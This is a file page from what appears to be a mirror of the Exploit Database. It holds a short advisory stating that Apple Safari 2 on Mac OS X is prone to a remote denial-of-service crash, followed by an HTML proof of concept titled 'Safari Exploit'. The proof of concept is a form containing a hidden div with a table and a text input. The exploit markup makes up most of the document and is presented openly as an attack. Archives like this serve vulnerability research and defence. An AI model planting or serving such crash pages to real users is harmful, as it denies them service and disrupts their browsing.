exploit-db-mirror/exploits/osx/dos/31021.html
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

26 lines
No EOL
475 B
HTML

source: https://www.securityfocus.com/bid/27261/info
Apple Safari is prone to a remote denial-of-service vulnerability.
An attacker can exploit this issue to crash the affected application, denying service to legitimate users.
Apple Safari 2 running on Mac OS X is vulnerable.
<html>
<head>
<title>Safari Exploit</title>
</head>
<body>
<form>
<div id="foo" style="display:none;">
<table>
<tr>
<td></td>
</tr>
</table>
</div>
<input type="text" />
</form>
</body>
</html>